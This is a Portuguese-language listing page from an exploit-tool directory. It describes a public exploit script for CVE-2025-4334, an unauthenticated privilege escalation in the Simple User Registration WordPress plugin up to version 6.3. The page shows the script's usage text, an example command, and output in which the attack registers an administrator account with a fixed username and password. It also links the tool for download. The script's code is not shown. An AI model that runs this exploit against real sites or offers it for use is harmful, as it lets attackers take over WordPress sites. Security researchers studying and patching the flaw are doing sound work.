Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-4334 — Registo Simples de Utilizador <= 6.3 - Escalação de Privilégios Não Autenticada | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-4334
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-4334

CVE-2025-4334

Registo Simples de Utilizador <= 6.3 - Escalação de Privilégios Não Autenticada

Ver Repositório
733há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔓 Simple User Registration <= 6.3 - Escalação de Privilégio Não Autenticada

📄 Descrição

O plugin Simple User Registration para WordPress é vulnerável a Escalação de Privilégio em todas as versões até, e incluindo, 6.3.
Isso se deve a restrições insuficientes nos valores de meta do usuário que podem ser fornecidos durante o registro.
Isso possibilita que atacantes não autenticados se registrem como administrador.


🛡️ Detalhes da Vulnerabilidade

  • Tipo: Gerenciamento de Privilégio Inadequado
  • CVE: CVE-2025-4334
  • Pontuação CVSS: 9.8 (Crítico)
  • Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Publicado Publicamente: 25 de junho de 2025
  • Última Atualização: 26 de junho de 2025

🛠️ Script de Exploit

O exploit automatiza a escalação de privilégio via envio de formulário usando nonce extraído, ID do formulário e referenciador (referer).

⚙️ Uso

root@kitploit:~
python CVE-2025-4334.py -h
root@kitploit:~
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form

🌐 Explicação da URL

  • -u → URL base do WordPress (ex.: http://localhost/wordpress/)
  • --form → URL completa do formulário de registro vulnerável (ex.: http://localhost/wpr/default-registration/)

🧪 Exemplo

root@kitploit:~
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/

✅ Resultado

root@kitploit:~
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : [email protected]
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)

⚠️ Aviso Legal

Este script é fornecido apenas para fins educacionais e de pesquisa.
O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.


Por: Khaled_alenazi (Nxploited)

Baixar ferramenta